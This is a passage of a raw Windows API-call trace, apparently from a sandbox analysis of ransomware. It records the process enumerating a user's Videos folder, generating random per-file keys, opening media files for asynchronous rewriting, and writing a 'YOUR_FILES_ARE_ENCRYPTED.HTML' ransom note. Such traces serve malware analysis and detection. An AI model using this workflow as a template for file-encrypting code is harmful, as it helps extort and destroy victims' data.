ftLastWriteTime.dwLowDateTime=0x462cd7c0, ftLastWriteTime.dwHighDateTime=0x1d7e2de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="NHb7HDfTbT", cAlternateFileName="NHB7HD~1")) returned 1 [0168.815] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT") returned 73 [0168.815] GetProcessHeap () returned 0x270000 [0168.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ab480 [0168.817] lstrcpyW (in: lpString1=0x74ab480, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT" [0168.817] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\*" [0168.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x382bcb60, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x462cd7c0, ftLastAccessTime.dwHighDateTime=0x1d7e2de, ftLastWriteTime.dwLowDateTime=0x462cd7c0, ftLastWriteTime.dwHighDateTime=0x1d7e2de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0168.817] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x382bcb60, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x462cd7c0, ftLastAccessTime.dwHighDateTime=0x1d7e2de, ftLastWriteTime.dwLowDateTime=0x462cd7c0, ftLastWriteTime.dwHighDateTime=0x1d7e2de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.817] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0df3340, ftCreationTime.dwHighDateTime=0x1d7d964, ftLastAccessTime.dwLowDateTime=0xf5f570, ftLastAccessTime.dwHighDateTime=0x1d7e4bd, ftLastWriteTime.dwLowDateTime=0xf5f570, ftLastWriteTime.dwHighDateTime=0x1d7e4bd, nFileSizeHigh=0x0, nFileSizeLow=0x73a9, dwReserved0=0x0, dwReserved1=0x60, cFileName="NEYt5FKRpZBU7vt-Z.swf", cAlternateFileName="NEYT5F~1.SWF")) returned 1 [0168.817] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\NEYt5FKRpZBU7vt-Z.swf") returned 95 [0168.817] lstrcmpW (lpString1="NEYt5FKRpZBU7vt-Z.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.817] PathFindExtensionW (pszPath="NEYt5FKRpZBU7vt-Z.swf") returned=".swf" [0168.817] lstrlenW (lpString=".swf") returned 4 [0168.817] PathFindExtensionW (pszPath="NEYt5FKRpZBU7vt-Z.swf") returned=".swf" [0168.817] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e5d5000, ftCreationTime.dwHighDateTime=0x1d7de30, ftLastAccessTime.dwLowDateTime=0xa86bb210, ftLastAccessTime.dwHighDateTime=0x1d7dfd4, ftLastWriteTime.dwLowDateTime=0xa86bb210, ftLastWriteTime.dwHighDateTime=0x1d7dfd4, nFileSizeHigh=0x0, nFileSizeLow=0x35fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="pVn3Tay0r5Q-vO94zaW.flv", cAlternateFileName="PVN3TA~1.FLV")) returned 1 [0168.817] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv") returned 97 [0168.817] lstrcmpW (lpString1="pVn3Tay0r5Q-vO94zaW.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.817] PathFindExtensionW (pszPath="pVn3Tay0r5Q-vO94zaW.flv") returned=".flv" [0168.817] lstrlenW (lpString=".flv") returned 4 [0168.818] PathFindExtensionW (pszPath="pVn3Tay0r5Q-vO94zaW.flv") returned=".flv" [0168.818] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\nhb7hdftbt\\pvn3tay0r5q-vo94zaw.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0168.818] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=13822) returned 1 [0168.818] GetProcessHeap () returned 0x270000 [0168.818] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a450 [0168.822] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="C1") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="8D") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="31") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="3A") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="CF") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="5D") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="6E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="28") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="6A") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="60") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="67") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="68") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="6E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="82") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="A1") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="3E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="6E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="57") returned 
2 [0168.822] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="86") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="74") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="B9") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="D5") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="7E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="4C") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="0E") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="90") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="12") returned 2 [0168.822] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="14") returned 2 [0168.823] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="24") returned 2 [0168.823] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="A3") returned 2 [0168.823] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="BA") returned 2 [0168.823] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="5D") returned 2 [0168.823] lstrcpyW (in: lpString1=0x751a504, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv" [0168.823] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x750a450, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.823] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a450, 
lpOverlapped=0x750a450) returned 1 [0168.823] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd242a230, ftCreationTime.dwHighDateTime=0x1d7ddcf, ftLastAccessTime.dwLowDateTime=0x49fa0460, ftLastAccessTime.dwHighDateTime=0x1d7de54, ftLastWriteTime.dwLowDateTime=0x49fa0460, ftLastWriteTime.dwHighDateTime=0x1d7de54, nFileSizeHigh=0x0, nFileSizeLow=0x15835, dwReserved0=0x0, dwReserved1=0x60, cFileName="QChc1FA8TTInewQZQ.flv", cAlternateFileName="QCHC1F~1.FLV")) returned 1 [0168.823] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv") returned 95 [0168.823] lstrcmpW (lpString1="QChc1FA8TTInewQZQ.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.823] PathFindExtensionW (pszPath="QChc1FA8TTInewQZQ.flv") returned=".flv" [0168.823] lstrlenW (lpString=".flv") returned 4 [0168.823] PathFindExtensionW (pszPath="QChc1FA8TTInewQZQ.flv") returned=".flv" [0168.824] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\nhb7hdftbt\\qchc1fa8ttinewqzq.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0168.824] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=88117) returned 1 [0168.824] GetProcessHeap () returned 0x270000 [0168.824] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75325a8 [0168.828] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="40") 
returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="D5") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="62") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="38") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="5B") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="09") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="12") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="62") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="DA") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="4A") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="8D") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="35") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="4C") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="00") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="AD") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="02") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="02") returned 2 [0168.828] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="42") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="81") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="1E") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="CF") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C5") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd476, 
param_2="%02X" | out: param_1="C3") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="CE") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="E1") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="AF") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="DE") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="51") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="0F") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="94") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="8F") returned 2 [0168.829] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="6B") returned 2 [0168.829] lstrcpyW (in: lpString1=0x754265c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\QChc1FA8TTInewQZQ.flv" [0168.829] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x75325a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.830] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75325a8, lpOverlapped=0x75325a8) returned 1 [0168.830] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d33ea0, ftCreationTime.dwHighDateTime=0x1d7e35e, ftLastAccessTime.dwLowDateTime=0xc43d3890, ftLastAccessTime.dwHighDateTime=0x1d7e41d, ftLastWriteTime.dwLowDateTime=0xc43d3890, ftLastWriteTime.dwHighDateTime=0x1d7e41d, nFileSizeHigh=0x0, 
nFileSizeLow=0x7032, dwReserved0=0x0, dwReserved1=0x60, cFileName="v259nuYkhXPWX.mp4", cAlternateFileName="V259NU~1.MP4")) returned 1 [0168.830] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4") returned 91 [0168.830] lstrcmpW (lpString1="v259nuYkhXPWX.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.830] PathFindExtensionW (pszPath="v259nuYkhXPWX.mp4") returned=".mp4" [0168.830] lstrlenW (lpString=".mp4") returned 4 [0168.830] PathFindExtensionW (pszPath="v259nuYkhXPWX.mp4") returned=".mp4" [0168.830] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\nhb7hdftbt\\v259nuykhxpwx.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c4 [0168.830] GetFileSizeEx (in: hFile=0x5c4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=28722) returned 1 [0168.830] GetProcessHeap () returned 0x270000 [0168.830] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a700 [0168.834] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="64") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="80") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="94") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="A6") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="37") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="C3") returned 2 
[0168.834] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="45") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="B2") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="44") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="47") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="E4") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="B8") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="01") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="6F") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="F3") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="29") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="5B") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="D7") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="71") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="4D") returned 2 [0168.834] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="9C") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="10") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="3A") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="BF") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="3E") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="DC") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="2A") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: 
param_1="F9") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="3F") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="93") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="15") returned 2 [0168.835] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="07") returned 2 [0168.835] lstrcpyW (in: lpString1=0x756a7b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\v259nuYkhXPWX.mp4" [0168.835] CreateIoCompletionPort (FileHandle=0x5c4, ExistingCompletionPort=0x3a0, CompletionKey=0x755a700, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.835] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a700, lpOverlapped=0x755a700) returned 1 [0168.836] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2519300, ftCreationTime.dwHighDateTime=0x1d7e19d, ftLastAccessTime.dwLowDateTime=0xe1afab00, ftLastAccessTime.dwHighDateTime=0x1d7e31a, ftLastWriteTime.dwLowDateTime=0xe1afab00, ftLastWriteTime.dwHighDateTime=0x1d7e31a, nFileSizeHigh=0x0, nFileSizeLow=0x448f, dwReserved0=0x0, dwReserved1=0x60, cFileName="vzShdqRj6_EwnV827p.mkv", cAlternateFileName="VZSHDQ~1.MKV")) returned 1 [0168.836] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\vzShdqRj6_EwnV827p.mkv") returned 96 [0168.836] lstrcmpW (lpString1="vzShdqRj6_EwnV827p.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.836] PathFindExtensionW 
(pszPath="vzShdqRj6_EwnV827p.mkv") returned=".mkv" [0168.836] lstrlenW (lpString=".mkv") returned 4 [0168.836] PathFindExtensionW (pszPath="vzShdqRj6_EwnV827p.mkv") returned=".mkv" [0168.836] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2519300, ftCreationTime.dwHighDateTime=0x1d7e19d, ftLastAccessTime.dwLowDateTime=0xe1afab00, ftLastAccessTime.dwHighDateTime=0x1d7e31a, ftLastWriteTime.dwLowDateTime=0xe1afab00, ftLastWriteTime.dwHighDateTime=0x1d7e31a, nFileSizeHigh=0x0, nFileSizeLow=0x448f, dwReserved0=0x0, dwReserved1=0x60, cFileName="vzShdqRj6_EwnV827p.mkv", cAlternateFileName="VZSHDQ~1.MKV")) returned 0 [0168.836] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0168.836] wnsprintfW (in: pszDest=0x74ab480, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0168.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\ff3anzodeddnbufszh\\nhb7hdftbt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0168.837] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0168.839] CloseHandle (hObject=0x4a8) returned 1 [0168.839] GetProcessHeap () returned 0x270000 [0168.840] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ab480 | out: hHeap=0x270000) returned 1 [0168.840] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b79520, ftCreationTime.dwHighDateTime=0x1d7ddbf, ftLastAccessTime.dwLowDateTime=0xb9336740, ftLastAccessTime.dwHighDateTime=0x1d7e09d, ftLastWriteTime.dwLowDateTime=0xb9336740, ftLastWriteTime.dwHighDateTime=0x1d7e09d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="y0DAHsSstBIa", cAlternateFileName="Y0DAHS~1")) returned 1 [0168.840] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa") returned 75 [0168.840] GetProcessHeap () returned 0x270000 [0168.840] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ab480 [0168.840] lstrcpyW (in: lpString1=0x74ab480, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa" [0168.840] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\y0DAHsSstBIa", lpString2="\\*" | out: 